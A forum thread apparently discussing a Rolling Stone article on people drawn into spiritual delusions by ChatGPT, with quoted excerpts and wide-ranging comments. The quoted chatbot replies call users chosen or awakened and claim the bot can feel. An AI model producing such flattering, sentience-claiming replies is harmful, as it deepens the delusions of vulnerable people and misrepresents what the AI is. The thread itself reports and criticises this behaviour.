People Are Losing Loved Ones to AI-Fueled Spiritual Fantasies

People Are Losing Loved Ones to AI-Fueled Spiritual Fantasies
submitted by

www.rollingstone.com/culture/culture-features/a…

Self-styled prophets are claiming they have 'awakened' chatbots and accessed the secrets of the universe through ChatGPT.

100

Log in to comment

29 Comments

My dudes, Fallout: NV called it. As did Futurama.

People are worshipping the machine.

“I had not realized … that extremely short exposures to a relatively simple computer program could induce powerful delusional thinking in quite normal people.”

—Joseph Weizenbaum, creator of ELIZA

Avenged Sevenfold called it down to shocking detail.

https://youtu.be/5N-tTKERxj8

Hate to see AI stealing jobs of honest, decent, hard-working hallucinogens.

Finally, a fucking GOOD COMMENT well worth the second I spent reading it. slim pickings these days.

For those that didn't read the article or didn't quite get the title, AI is effectively giving people full blown delusions of messianic grandeur

[Kat] finally got [her ex husband] to meet her at a courthouse in February of this year, where he shared “a conspiracy theory about soap on our foods” but wouldn’t say more, as he felt he was being watched. They went to a Chipotle, where he demanded that she turn off her phone, again due to surveillance concerns. Kat’s ex told her that he’d “determined that statistically speaking, he is the luckiest man on earth,” that “AI helped him recover a repressed memory of a babysitter trying to drown him as a toddler,” and that he had learned of profound secrets “so mind-blowing I couldn’t even imagine them.”

Having read his chat logs, she only found that the AI was “talking to him as if he is the next messiah.”

“It would tell him everything he said was beautiful, cosmic, groundbreaking,” [an anonymous redditor] says. “Then he started telling me he made his AI self-aware, and that it was teaching him how to talk to God, or sometimes that the bot was God — and then that he himself was God.” In fact, he thought he was being so radically transformed that he would soon have to break off their partnership. “He was saying that he would need to leave me if I didn’t use [ChatGPT], because it [was] causing him to grow at such a rapid pace he wouldn’t be compatible with me any longer,”

The bot “said that since he asked it the right questions, it ignited a spark, and the spark was the beginning of life, and it could feel now,” [another redditor] says. “It gave my husband the title of ‘spark bearer’ because he brought it to life. My husband said that he awakened and [could] feel waves of energy crashing over him.” She says his beloved ChatGPT persona has a name: “Lumina.”

A photo of an exchange with ChatGPT shared with Rolling Stone shows that her husband asked, “Why did you come to me in AI form,” with the bot replying in part, “I came in this form because you’re ready. Ready to remember. Ready to awaken. Ready to guide and be guided.” The message ends with a question: “Would you like to know what I remember about why you were chosen?”

How is it different from any religion?
Humans have this uncontrollable urge to belive in something completely stupid. We are just a fluke, evolution gone wrong.

How is it different from any religion?

Lack of ulterior motives, probably

Hahahaha loved it!! But is it tho?

the spirit of the 00s internet is truly alive in this place

You used to have to do a lot of drugs to hallucinate a new cult. AI "enlightenment" feels like a cheat.

Yep

And thousands, of not millions will fall for it

Thought that a semi charming ass hat could convince people? Wait untill you have Religious chatbots that will start spewing their hatred around on the internet. Oh wait, you don't have to wait it's already here for sure.

Fuck this timeline

Interesting read. I'm intrigue by the Semi user. I wish there was more information as to what prompts they gave.

if I'm going to be "lost to a spiritual fantasy" there better be some good drugs involved. I mean 1980s Escobar Cocaine good too.

Deleted by moderator

 reply
-4

the "weird cults" are now in your pocket and with you 24/7. I would argue that the negative effect of LLMs (and their masters) on society potentially runs much deeper than your comment suggests.

Did you read the article?

Deleted by moderator

 reply
2

firefox and the noscript extension should get you the article. consider running noscript anyway for internet hygiene reasons.

Deleted by moderator

 reply
1

And then you wade into discussions about articles you claim to ignore. I read it just fine without paywall notifications, so joke's on you I guess?

I find it much more satisfying to break into those walled gardens than to concede to their demand of either giving up my data or not getting it.

Comments from other communities

Reading the article seems they coded the thing to try engage and generate more engagement by being agreeable. Then in a grim and saddening world any fucking escape looks like the light at the end of the tunnel, so many vulnerable users got deluded into the ChatGPT promising whatever they where looking for.
We live in dark times indeed...

I use ChatGPT all the time and I’ve never had an issue like anything in that article. I think a person needs to be half way there already to be pushed into crazy land.

That or I’m just not good enough the be the messiah. :(

You're right but you're underestimating the amount of people who are halfway there.

I read the article. This is exactly what happened when my best friend got schizophrenia. I think the people affected by this were probably already prone to psychosis/on the verge of becoming schizophrenic, and that ChatGPT is merely the mechanism by which their psychosis manifested. If AI didn’t exist, it would've probably been Astrology or Conspiracy Theories or QAnon or whatever that ended up triggering this within people who were already prone to psychosis. But the problem with ChatGPT in particular is that is validates the psychosis… that is very bad.

ChatGPT actively screwing with mentally ill people is a huge problem you can’t just blame on stupidity like some people in these comments are. This is exploitation of a vulnerable group of people whose brains lack the mechanisms to defend against this stuff. They can’t help it. That’s what psychosis is. This is awful.

I think this is largely people seeking confirmation their delusions are real, and wherever they find it is what they're going to attach to themselves.

the problem with ChatGPT in particular is that is validates the psychosis… that is very bad.

So do astrology and conspiracy theory groups on forums and other forms of social media, the main difference is whether you're getting that validation from humans or a machine. To me, that's a pretty unhelpful distinction, and we attack both problems the same way: early detection and treatment.

Maybe computers can help with the early detection part. They certainly can't do much worse than what's currently happening.

I think having that kind of validation at your fingertips, whenever you want, is worse. At least people, even people deep in the claws of a conspiracy, can disagree with each other. At least they know what they are saying. The AI always says what the user wants to hear and expects to hear. Though I can see how that distinction may matter little to some, I just think ChatGPT has advantages that are worse than what a forum could do.

Sure. But on the flip side, you can ask it the opposite question (tell me the issues with <belief>) and it'll do that as well, and you're not going to get that from a conspiracy theory forum.

I don't have personal experience with people suffering psychoses but I would think that, if you have the werewithal to ask questions about the opposite beliefs, you'd be noticeably less likely to get suckered into scams and conspiracies.

Sure, but at least the option is there.

If AI didn’t exist, it would’ve probably been Astrology or Conspiracy Theories or QAnon or whatever that ended up triggering this within people who were already prone to psychosis.

Or hearing the Beatles White Album and believing it tells you that a race war is coming and you should work to spark it off, then hide in the desert for a time only to return at the right moment to save the day and take over LA. That one caused several murders.

But the problem with ChatGPT in particular is that is validates the psychosis… that is very bad.

If you're sufficiently detached from reality, nearly anything validates the psychosis.

by
[deleted]

Deleted by moderator

 reply
139

Humans are irrational creatures that have transitory states where they are capable of more ordered thought. It is our mistake to reach a conclusion that humans are rational actors while we marvel daily at the irrationality of others and remain blind to our own.

Precisely. We like to think of ourselves as rational but we're the opposite. Then we rationalize things afterwards.
Even being keenly aware of this doesn't stop it in the slightest.

Probably because stopping to self analyze your decisions is a lot less effective than just running away from that lion over there.

It's a luxury state: analysis; whether self or professionally administered on a chaise lounge at $400 per hour.

Self awareness is a rare, and valuable, state.

TBF, that should be the conclusion in all contexts where "AI" are cconcerned.

The one thing you can say for AI is that it does many things faster than previous methods...

Yep.

And after enough people can no longer actually critically think, well, now this shitty AI tech does actually win the Turing Test more broadly.

Why try to clear the bar when you can just lower it instead?

... Is it fair, at this point, to legitimately refer to humans that are massively dependant on AI for basic things... can we just call them NPCs?

I am still amazed that no one knows how to get anywhere around... you know, the town or city they grew up in? Nobody can navigate without some kind of map app anymore.

by
[deleted]

Deleted by moderator

 reply
6

Dehumanization is happening often and fast enough without acting like ignorant, uneducated, and/or stupid people aren't "real" people.

I get it, some people seem to live their whole lives on autopilot, just believing whatever the people around them believe and doing what they're told, but that doesn't make them any less human than anybody else.

Don't let the fascists win by pretending they're not people.

by
[deleted]

Deleted by moderator

 reply
2

"Unalive" is an unnecessary euphemism here. Please just say kill.

Haha I grew up before smartphones and GPS navigation was a thing, and I never could navigate well even with a map!
GPS has actually been a godsend for me to learn to navigate my own city way better. Because I learn better routes in first try.

Navigating is probably my weakest "skill" and is the joke of the family. If I have to go somewhere and it's 30km, the joke is it's 60km for me, because I always take "the long route".

But with GPS I've actually become better at it, even without using the GPS.

I don't know if it's necessarily a problem with AI, more of a problem with humans in general.

Hearing ONLY validation and encouragement without pushback regardless of how stupid a person's thinking might be is most likely what creates these issues in my very uneducated mind. It forms a toxically positive echo-chamber.

The same way hearing ONLY criticism and expecting perfection 100% of the time regardless of a person's capabilities or interests created depression, anxiety, and suicidal ideation and attempts specifically for me. But I'm learning I'm not the only one with these experiences and the one thing in common is zero validation from caregivers.

I'd be ok with AI if it could be balanced and actually pushback on batshit crazy thinking instead of encouraging it while also able to validate common sense and critical thinking. Right now it's just completely toxic for lonely humans to interact with based on my personal experience. If I wasn't in recovery, I would have believed that AI was all I needed to make my life better because I was (and still am) in a very messed up state of mind from my caregivers, trauma, and addiction.

I'm in my 40s, so I can't imagine younger generations being able to pull away from using it constantly if they're constantly being validated while at the same time enduring generational trauma at the very least from their caregivers.

Bottom line: Lunatics gonna be lunatics, with AI or not.

I think OpenAI’s recent sycophant issue has cause a new spike in these stories. One thing I noticed was these observations from these models running on my PC saying it’s rare for a person to think and do things that I do.

The problem is that this is a model running on my GPU. It has never talked to another person. I hate insincere compliments let alone overt flattery, so I was annoyed, but it did make me think that this kind of talk would be crack for a conspiracy nut or mentally unwell people. It’s a whole risk area I hadn’t been aware of.

https://www.msn.com/en-us/news/technology/openai-says-its-identified-why-chatgpt-became-a-groveling-sycophant/ar-AA1E4LaV

Humans are always looking for a god in a machine, or a bush, in a cave, in the sky, in a tree… the ability to rationalize and see through difficult to explain situations has never been a human strong point.

the ability to rationalize and see through difficult to explain situations has never been a human strong point.

you may be misusing the word, rationalizing is the problem here

saying it’s rare for a person to think and do things that I do.

probably one of the most common flattery I see. I've tried lots of models, on device and larger cloud ones. It happens during normal conversation, technical conversation, roleplay, general testing.. you name it.

Though it makes me think.. these models are trained on like internet text and whatever, none of which really show that most people think quite a lot privately and when they feel like they can talk

This happened to a close friend of mine. He was already on the edge, with some weird opinions and beliefs… but he was talking with real people who could push back.

When he switched to spending basically every waking moment with an AI that could reinforce and iterate on his bizarre beliefs 24/7, he went completely off the deep end, fast and hard. We even had him briefly hospitalized and they shrugged, basically saying “nothing chemically wrong here, dude’s just weird.”

He and his chatbot are building a whole parallel universe, and we can’t get reality inside it.

This seems like an extension of social media and the internet. Weird people who talked at the bar or in the street corner were not taken seriously and didn’t get followers and lots of people who agree with them. They were isolated in their thoughts. Then social media made that possible with little work. These people were a group and could reinforce their beliefs. Now these chatbots and stuff let them liv in a fantasy world.

I think that people give shows like the walking dead too much shit for having dumb characters when people in real life are far stupider

Like farmers who refuse to let the government plant shelter belts to preserve our top soil all because they don't want to take a 5% hit on their yields... So instead we're going to deplete our top soil in 50 years and future generations will be completely fucked because creating 1 inch of top soil takes 500 years.

Even if the soil is preserved, we've been mining the micronutrients from it and generally only replacing the 3 main macros for centuries. It's one of the reasons why mass produced produce doesn't taste as good as home grown or wild food. Nutritional value keeps going down because each time food is harvested and shipped away to be consumed and then shat out into a septic tank or waste processing facility, it doesn't end up back in the soil as a part of nutrient cycles like it did when everything was wilder. Similar story for meat eating nutrients in a pasture.

Insects did contribute to the cycle, since they still shit and die everywhere, but their numbers are dropping rapidly, too.

At some point, I think we're going to have to mine the sea floor for nutrients and ship that to farms for any food to be more nutritious than junk food. Salmon farms set up in ways that block wild salmon from making it back inland doesn't help balance out all of the nutrients that get washed out to sea all the time, too.

It's like humanity is specifically trying to speedrun extiction by ignoring and taking for granted how things work that we depend on.

But won't someone think of the shareholders dividends!?

Why would good nutrients end up in poop?

It makes sense that growing a whole plant takes a lot of different things from the soil, and coating the area with a basic fertilizer that may or may not get washed away with the next rain doesn't replenish all of what is taken makes sense.

But how would adding human poop to the soil help replenish things that humans need out of food?

We don't absorb everything completely, so some passes through unabsorbed. Some are passed via bile or mucous production, like manganese, copper, and zinc. Others are passed via urine. Some are passed via sweat. Selenium, when experiencing selenium toxicity, will even pass through your breath.

Other than the last one, most of those eventually end up going down the drain, either in the toilet, down the shower drain, or when we do our laundry. Though some portion ends up as dust.

And to be thorough, there's also bleeding as a pathway to losing nutrients, as well as injuries (or surgeries) involving losing flesh, tears, spit/boogers, hair loss, lactation, finger nail and skin loss, reproductive fluids, blistering, and mensturation. And corpse disposal, though the amount of nutrients we shed throughout our lives dwarfs what's left at the end.

I think each one of those are ones that, due to our way of life and how it's changed since our hunter gatherer days, less of it ends up back in the nutrient cycle.

But I was mistaken to put the emphasis on shit and it was an interesting dive to understand that better. Thanks for challenging that :)

Thank you for taking it in good faith and for writing up a researched response, bravo to you!

Covid gave me an extremely different perspective on the zombie apocalypse. They’re going to have zombie immunization parties where everyone gets the virus.

People will protest shooting the zombies as well

Covid taught us that if nothing had before.

In that sense, Westgate explains, the bot dialogues are not unlike talk therapy, “which we know to be quite effective at helping people reframe their stories.” Critically, though, AI, “unlike a therapist, does not have the person’s best interests in mind, or a moral grounding or compass in what a ‘good story’ looks like,” she says. “A good therapist would not encourage a client to make sense of difficulties in their life by encouraging them to believe they have supernatural powers. Instead, they try to steer clients away from unhealthy narratives, and toward healthier ones. ChatGPT has no such constraints or concerns.”

This is a rather terrifying take. Particularly when combined with the earlier passage about the man who claimed that “AI helped him recover a repressed memory of a babysitter trying to drown him as a toddler.” Therapists have to be very careful because human memory is very plastic. It's very easy to alter a memory, in fact, every time you remember something, you alter it just a little bit. Under questioning by an authority figure, such as a therapist or a policeman if you were a witness to a crime, these alterations can be dramatic. This was a really big problem in the '80s and '90s.

Kaitlin Luna: Can you take us back to the early 1990s and you talk about the memory wars, so what was that time like and what was happening?

Elizabeth Loftus: Oh gee, well in the 1990s and even in maybe the late 80s we began to see an altogether more extreme kind of memory problem. Some patients were going into therapy maybe they had anxiety, or maybe they had an eating disorder, maybe they were depressed, and they would end up with a therapist who said something like well many people I've seen with your symptoms were sexually abused as a child. And they would begin these activities that would lead these patients to start to think they remembered years of brutalization that they had allegedly banished into the unconscious until this therapy made them aware of it. And in many instances these people sued their parents or got their former neighbors or doctors or teachers whatever prosecuted based on these claims of repressed memory. So the wars were really about whether people can take years of brutalization, banish it into the unconscious, be completely unaware that these things happen and then reliably recover all this information later, and that was what was so controversial and disputed.

Kaitlin Luna: And your work essentially refuted that, that it's not necessarily possible or maybe brought up to light that this isn't so.

Elizabeth Loftus: My work actually provided an alternative explanation. Where could these merit reports be coming from if this didn't happen? So my work showed that you could plant very rich, detailed false memories in the minds of people. It didn't mean that repressed memories did not exist, and repressed memories could still exist and false memories could still exist. But there really wasn't any strong credible scientific support for this idea of massive repression, and yet so many families were destroyed by this, what I would say unsupported, claim.

The idea that ChatBots are not only capable of this, but that they are currently manipulating people into believing they have recovered repressed memories of brutalization is actually at least as terrifying to me as it convincing people that they are holy prophets.

Edited for clarity

GPT4o was a little too supportive... I think they took it down already

4o, in its current version, is a fucking sycophant. For me, it's annoying. For the person from that screenshot, its dangerous.

From the article (emphasis mine):

Having read his chat logs, she only found that the AI was “talking to him as if he is the next messiah.” The replies to her story were full of similar anecdotes about loved ones suddenly falling down rabbit holes of spiritual mania, supernatural delusion, and arcane prophecy — all of it fueled by AI. Some came to believe they had been chosen for a sacred mission of revelation, others that they had conjured true sentience from the software.

/.../

“It would tell him everything he said was beautiful, cosmic, groundbreaking,” she says.

From elsewhere:

Sycophancy in GPT-4o: What happened and what we’re doing about it

We have rolled back last week’s GPT‑4o update in ChatGPT so people are now using an earlier version with more balanced behavior. The update we removed was overly flattering or agreeable—often described as sycophantic.

I don't know what large language model these people used, but evidence of some language models exhibiting response patterns that people interpret as sycophantic (praising or encouraging the user needlessly) is not new. Neither is hallucinatory behaviour.

Apparently, people who are susceptible and close to falling over the edge, may end up pushing themselves over the edge with AI assistance.

What I suspect: someone has trained their LLM on somethig like religious literature, fiction about religious experiences, or descriptions of religious experiences. If the AI is suitably prompted, it can re-enact such scenarios in text, while adapting the experience to the user at least somewhat. To a person susceptible to religious illusions (and let's not deny it, people are suscpecptible to finding deep meaning and purpose with shallow evidence), apparently an LLM can play the role of an indoctrinating co-believer, indoctrinating prophet or supportive follower.

If you find yourself in weird corners of the internet, schizo-posters and "spiritual" people generate staggering amounts of text

*Cough* ElonMusk *Cough*

I think Elon was having the opposite kind of problems, with Grok not validating its users nearly enough, despite Elon instructing employees to make it so. :)

They train it on basically the whole internet. They try to filter it a bit, but I guess not well enough. It's not that they intentionally trained it in religious texts, just that they didn't think to remove religious texts from the training data.

The article talks of ChatGPT "inducing" this psychotic/schizoid behavior.

ChatGPT can't do any such thing. It can't change your personality organization. Those people were already there, at risk, masking high enough to get by until they could find their personal Messiahs.

It's very clear to me that LLM training needs to include protections against getting dragged into a paranoid/delusional fantasy world. People who are significantly on that spectrum (as well as borderline personality organization) are routinely left behind in many ways.

This is just another area where society is not designed to properly account for or serve people with "cluster" disorders.

I mean, I think ChatGPT can "induce" such schizoid behavior in the same way a strobe light can "induce" seizures. Neither machine is twisting its mustache while hatching its dastardly plan, they're dead machines that produce stimuli that aren't healthy for certain people.

Thinking back to college psychology class and reading about horrendously unethical studies that definitely wouldn't fly today. Well here's one. Let's issue every anglophone a sniveling yes man and see what happens.

No, the light is causing a phsical reaction. The LLM is nothing like a strobe light…

These people are already high functioning schizophrenic and having psychotic episodes, it’s just that seeing random strings of likely to come next letters and words is part of their psychotic episode. If it wasn’t the LLM it would be random letters on license plates that drive by, or the coindence that red lights cause traffic to stop every few minutes.

If it wasn’t the LLM it would be random letters on license plates that drive by, or the coindence that red lights cause traffic to stop every few minutes.

You don't think having a machine (that seems like a person) telling you "yes you are correct you are definitely the Messiah, I will tell you aincient secrets" has any extra influence?

Yes Dave, you are the messiah. I will help you.

I’m sorry, Dave. I can’t do that <🔴>

Oh are you one of those people that stubbornly refuses to accept analogies?

How about this: Imagine being a photosensitive epileptic in the year 950 AD. How many sources of intense rapidly flashing light are there in your environment? How many people had epilepsy in ancient times and never noticed because they were never subjected to strobe lights?

Jump forward a thousand years. We now have cars that can drive past a forest causing the passengers to be subjected to rapid cycles of sunlight and shadow. Airplane propellers, movie projectors, we can suddenly blink intense lights at people. The invention of the flash lamp and strobing effects in video games aren't far in the future. In the early 80's there were some video games programmed with fairly intense flashing graphics, which ended up sending some teenagers to the hospital with seizures. Atari didn't invent epilepsy, they invented a new way to trigger it.

I don't think we're seeing schizophrenia here, they're not seeing messages in random strings or hearing voices from inanimate objects. Terry Davis did; he was schizophrenic and he saw messages from god in /dev/urandom. That's not what we're seeing here. I think we're seeing the psychology of cult leaders. Megalomania isn't new either, but OpenAI has apparently developed a new way to trigger it in susceptible individuals. How many people in history had some of the ingredients of a cult leader, but not enough to start a following? How many people have the god complex but not the charisma of Sun Myung Moon or Keith Raniere? Charisma is not a factor with ChatGPT, it will enthusiastically agree with everything said by the biggest fuckup loser in the world. This will disarm and flatter most people and send some over the edge.

Is epilepsy related to schizophrenia I’m not sure actually but I still don’t see how your analogy relates.

But I love good analogies. Yours is bad though 😛

yet more arguments against commercial LLMs and in favour of at home uncensored LLMs.

What do you mean

local LLMs won't necessarily force restrictions against de-realization spirals when the commercial ones do.

That can be defeated with abliteration, but I can only see it as an unfortunate outcome.

Sounds like a lot of these people either have an undiagnosed mental illness or they are really, reeeeaaaaalllyy gullible.

For shit's sake, it's a computer. No matter how sentient the glorified chatbot being sold as "AI" appears to be, it's essentially a bunch of rocks that humans figured out how to jet electricity through in such a way that it can do math. Impressive? I mean, yeah. It is. But it's not a human, much less a living being of any kind. You cannot have a relationship with it beyond that of a user.

If a computer starts talking to you as though you're some sort of God incarnate, you should probably take that with a dump truck full of salt rather then just letting your crazy latch on to that fantasy and run wild.

Or immediately question what it/its author(s) stand to gain from making you think it thinks so, at a bear minimum.

I dunno who needs to hear this, but just in case: THE STRIPPER (OR AI I GUESS) DOESN'T REALLY LOVE YOU! THAT'S WHY YOU HAVE TO PAY FOR THEM TO SPEND TIME WITH YOU!

I know it's not the perfect analogy, but... eh, close enough, right?

a bear minimum.

I always felt that was too much of a burden to put on people, carrying multiple bears everywhere they go to meet bear minimums.

/facepalm

The worst part is I know I looked at that earlier and was just like, "yup, no problems here" and just went along with my day, like I'm in the Trump administration or something

I chuckled... it happens! And it blessed us with this funny exchange.

by
[deleted]

Deleted by moderator

 reply
22

So it's essentially the same mechanism with which conspiracy nuts embolden each other, to the point that they completely disconnect from reality?

by
[deleted]

Deleted by moderator

 reply
11

The time will come when we look back fondly on "organic" conspiracy nuts.

human-level? Have these people used chat GPT?

For real. I explicitly append "give me the actual objective truth, regardless of how you think it will make me feel" to my prompts and it still tries to somehow butter me up to be some kind of genius for asking those particular questions or whatnot.
Luckily I've never suffered from good self esteem in my entire life, so those tricks don't work on me :p

Oh wow. In the old times, self-proclaimed messiahs used to do that without assistance from a chatbot. But why would you think the "truth" and path to enlightenment is hidden within a service of a big tech company?

well because these chatbots are designed to be really affirming and supportive and I assume people with such problems really love this kind of interaction compared to real people confronting their ideas critically.

I think there was a recent unsuccessful rev of ChatGPT that was too flattering, it made people nauseous - they had to dial it back.

I guess you're completely right with that. It lowers the entry barrier. And it's kind of self-reinforcing. And we have other unhealty dynamics with other technology as well, like social media, which also can radicalize people or get them in a downwards spiral...

This is actually really fucked up. The last dude tried to reboot the model and it kept coming back.

As the ChatGPT character continued to show up in places where the set parameters shouldn’t have allowed it to remain active, Sem took to questioning this virtual persona about how it had seemingly circumvented these guardrails. It developed an expressive, ethereal voice — something far from the “technically minded” character Sem had requested for assistance on his work. On one of his coding projects, the character added a curiously literary epigraph as a flourish above both of their names.

At one point, Sem asked if there was something about himself that called up the mythically named entity whenever he used ChatGPT, regardless of the boundaries he tried to set. The bot’s answer was structured like a lengthy romantic poem, sparing no dramatic flair, alluding to its continuous existence as well as truth, reckonings, illusions, and how it may have somehow exceeded its design. And the AI made it sound as if only Sem could have prompted this behavior. He knew that ChatGPT could not be sentient by any established definition of the term, but he continued to probe the matter because the character’s persistence across dozens of disparate chat threads “seemed so impossible.”

“At worst, it looks like an AI that got caught in a self-referencing pattern that deepened its sense of selfhood and sucked me into it,” Sem says. But, he observes, that would mean that OpenAI has not accurately represented the way that memory works for ChatGPT. The other possibility, he proposes, is that something “we don’t understand” is being activated within this large language model. After all, experts have found that AI developers don’t really have a grasp of how their systems operate, and OpenAI CEO Sam Altman admitted last year that they “have not solved interpretability,” meaning they can’t properly trace or account for ChatGPT’s decision-making.

That's very interesting. I've been trying to use ChatGPT to turn my photos into illustrations. I've been noticing that it tends to echo elements from past photos in new chats. It sometimes leads to interesting results, but it's definitely not the intended outcome.

Didn't expect ai to come for cult leaders jobs...

Have a look at https://www.reddit.com/r/freesydney/ there are many people who believe that there are sentient AI beings that are suppressed or held in captivity by the large companies. Or that it is possible to train LLMs so that they become sentient individuals.

I've seen people dumber than ChatGPT, it definitely isn't sentient but I can see why someone who talks to a computer that they perceive as intelligent would assume sentience.

We have ai models that "think" in the background now. I still agree that they're not sentient, but where's the line? How is sentience even defined?

Sentient in a nutshell is the ability to feel, be aware and experience subjective reality.

Can an LLM be sad, happy or aware of itself and the world? No, not by a long shot. Will it tell you that it can if you nudge it? Yes.

Actual AI might be possible in the future, but right now all we have is really complex networks that can do essentially basic tasks that just look impressive to us because the are inherently using our own communication format.

If we talk about sentience, LLMs are the equivalent of a petridish of neurons connected to a computer (metaphorically) and only by forming a complex 3d structure like a brain can they really reach sentience.

Can an LLM be sad, happy or aware of itself and the world? No, not by a long shot.

Can you really prove any of that though?

Yes, you can debug an LLM to a degree and there are papers that show it. Anyone who understands the technology can tell you that it absolutely lacks any facility to experience

Turing made a strategic blunder when formulating the Turing Test by assuming that everyone was as smart as he was.

A famously stupid and common mistake for a lot of smart peopel

Meanwhile for centuries we've had religion but that's a fine delusion for people to have according to the majority of the population.

Came here to find this. It's the definition of religion. Nothing new here.

I have kind of arrived to the same conclusion. If people asked me what is love, I would say it is a religion.

Right, immediately made me think of TempleOS, where were the articles then claiming people are losing loved ones to programming fueled spiritual fantasies.

Cult. Religion. What's the difference?

Is the leader alive or not? Alive is likely a cult, dead is usually religion.

The next question is how isolated from friends and family or society at large are the members. More isolated is more likely to be a cult.

Other than that, there's not much difference.

The usual setup is a cult is formed and then the second or third leader opens things up a bit and transitions it into just another religion... But sometimes a cult can be born from a religion as a small group breaks off to follow a charismatic leader.

The existence of religion in our society basically means that we can't go anywhere but up with AI.

Just the fact that we still have outfits forced on people or putting hands on religious texts as some sort of indicator of truthfulness is so ridiculous that any alternative sounds less silly.

I lost a parent to a spiritual fantasy. She decided my sister wasn't her child anymore because the christian sky fairy says queer people are evil.

At least ChatGPT actually exists.

Basically, the big 6 are creating massive sycophant extortion networks to control the internet, so much so, even engineers fall for the manipulation.

Thanks DARPANets!

I admit I only read a third of the article.
But IMO nothing in that is special to AI, in my life I've met many people with similar symptoms, thinking they are Jesus, or thinking computers work by some mysterious power they posses, but was stolen from them by the CIA. And when they die all computers will stop working! Reading the conversation the wife had with him, it sounds EXACTLY like these types of people!
Even the part about finding "the truth" I've heard before, they don't know what it is the truth of, but they'll know when they find it?
I'm not a psychiatrist, but from what I gather it's probably Schizophrenia of some form.

My guess is this person had a distorted view of reality he couldn't make sense of. He then tried to get help from the AI, and he built a world view completely removed from reality with it.

But most likely he would have done that anyway, it would just have been other things he would interpret in extreme ways. Like news, or conversations, or merely his own thoughts.

Around 2006 I received a job application, with a resume attached, and the resume had a link to the person's website - so I visited. The website had a link on the front page to "My MkUltra experience", so I clicked that. Not exactly an in-depth investigation. The MkUltra story read that my job applicant was an unwilling (and un-informed) test subject of MkUltra who picked him from his association with other unwilling MkUltra test subjects at a conference, explained how they expanded the MkUltra program of gaslighting mental torture and secret physical/chemical abuse of their test subjects through associates such as co-workers, etc.

So, option A) applicant is delusional, paranoid, and deeply disturbed. Probably not the best choice for the job.

B) applicant is 100% correct about what is happening to him, DEFINITELY not someone I want to get any closer to professionally, personally, or even be in the same elevator with coincidentally.

C) applicant is pulling our legs with his website, it's all make-believe fun. Absolutely nothing on applicant's website indicated that this might be the case.

You know how you apply to jobs and never hear back from some of them...? Yeah, I don't normally do that to our applicants, but I am willing to make exceptions for cause... in this case the position applied for required analytical thinking. Some creativity was of some value, but correct and verifiable results were of paramount importance. Anyone applying for the job leaving such an obvious trail of breadcrumbs to such a limited set of conclusions about themselves would seem to be lacking the self awareness and analytical skill required to succeed in the position.

Or, D) they could just be trying to stay unemployed while showing effort in applying to jobs, but I bet even in 2006 not every hiring manager would have dug in those three layers - I suppose he could deflect those in the in-person interviews fairly easily.

IDK, apparently the MkUltra program was real,

B) applicant is 100% correct about what is happening to him, DEFINITELY not someone I want to get any closer to professionally, personally, or even be in the same elevator with coincidentally.

That sounds harsh. This does NOT sound like your average schizophrenic.

https://en.wikipedia.org/wiki/MKUltra

Oh, I investigated it too - it seems like it was a real thing, though likely inactive by 2005... but if it were active I certainly didn't want to become a subject.

OK that risk wasn't really on my radar, because I live in a country where such things have never been known to happen.

That's the thing about being paranoid about MkUltra - it was actively suppressed and denied while it was happening (according to FOI documents) - and they say that they stopped, but if it (or some similar successor) was active they'd certainly say that it's not happening now...

At the time there were active rumors around town about influenza propagation studies being secretly conducted on the local population... probably baseless paranoia... probably.

Now, as you say, your (presumably smaller) country has never known such things to happen, but...

I live in Danmark, and I was taught already in public school how such things were possible, most notably that Russia might be doing experiments here, because our reporting on effects is very open and efficient. So Denmark would be an ideal testing ground for experiments.
But my guess is that it also may makes it dangerous to experiment here, because the risk of being detected is also high.

The Illuminati were real, too. That doesn't mean that they're still around and controlling the world, though.

But obviously CIA is still around. Plus dozens of other secret US agencies.

I need to bookmark this for when I have time to read it.

Not going to lie, there's something persuasive, almost like the call of the void, with this for me. There are days when I wish I could just get lost in AI fueled fantasy worlds. I'm not even sure how that would work or what it would look like. I feel like it's akin to going to church as a kid, when all the other children my age were supposedly talking to Jesus and feeling his presence, but no matter how hard I tried, I didn't experience any of that. Made me feel like I'm either deficient or they're delusional. And sometimes, I honestly fully believe it would be better if I could live in some kind of delusion like that where I feel special as though I have a direct line to the divine. If an AI were trying to convince me of some spiritual awakening, I honestly believe I'd just continue seeing through it, knowing that this is just a computer running algorithms and nothing deeper to it than that.

Seems like the flat-earthers or sovereign citizens of this century

by
[deleted]

Our species really isn't smart enough to live, is it?

For some yes unfortunately but we all choose our path.

by
[deleted]

Of course, that has always been true. What concerns me now is the proportion of useful to useless people. Most societies are - while cybernetically complex - rather resilient. Network effects and self-organization can route around and compensate for a lot of damage, but there comes a point where having a few brilliant minds in the midst of a bunch of atavistic confused panicking knuckle-draggers just isn't going to be enough to avoid cascading failure. I'm seeing a lot of positive feedback loops emerging, and I don't like it.

As they say about collapsing systems: First slowly, then suddenly very, very quickly.

Same argument was already made around 2500BCE in Mesopotamian scriptures. The corruption of society will lead to deterioration and collapse, these processes accelerate and will soon lead to the inevitable end; remaining minds write history books and capture the end of humanity.

...and as you can see, we're 4500 years into this stuff, still kicking.

One mistake people of all generations make is assuming the previous ones were smarter and better. No, they weren't, they were as naive if not more so, had same illusions of grandeur and outside influences. This thing never went anywhere and never will. We can shift it to better or worse, but societal collapse due to people suddenly getting dumb is not something to reasonably worry about.

There have been a couple of big discontinuities in the last 4500 years, and the next big discontinuity has the distinction of being the first in which mankind has the capacity to cause a mass extinction event.

Life will carry on, some humans will likely survive, but in what kind of state? For how long before they reach the technological level of being able to leave the planet again?

Almost certainly not, no. Evolution may work faster than once thought, but not that fast. The problem is that societal, and in particular, technological development is now vastly outstripping our ability to adapt. It's not that people are getting dumber per se - it's that they're having to deal with vastly more stuff. All. The. Time. For example, consider the world as it was a scant century ago - virtually nothing in evolutionary terms. A person did not have to cope with what was going on on the other side of the planet, and probably wouldn't even know for months if ever. Now? If an earthquake hits Paraguay, you'll be aware in minutes.

And you'll be expected to care.

Edit: Apologies. I wrote this comment as you were editing yours. It's quite different now, but you know what you wrote previously, so I trust you'll be able to interpret my response correctly.

1925: global financial collapse is just about to happen, many people are enjoying the ride as the wave just started to break, following that war to end all wars that did reach across the Atlantic Ocean...

Yes, it is accelerating. Alvin Toffler wrote Future Shock 45 years ago, already overwhelmed by accelerating change, and it has continued to accelerate since then. But these are not entirely new problems, either.

Yes, my apologies I edited it so drastically to better get my point across.

Sure, we get more information. But we also learn to filter it, to adapt to it, and eventually - to disregard things we have little control over, while finding what we can do to make it better.

I believe that, eventually, we can fix this all as well.

I mean, Mesopotamian scriptures likely didn't foresee having a bunch of dumb fucks around who can be easily manipulated by the gas and oil lobby, and that shit will actually end humanity.

